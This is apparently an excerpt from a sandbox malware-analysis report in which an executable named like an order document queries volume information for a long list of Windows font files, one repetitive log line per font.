Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
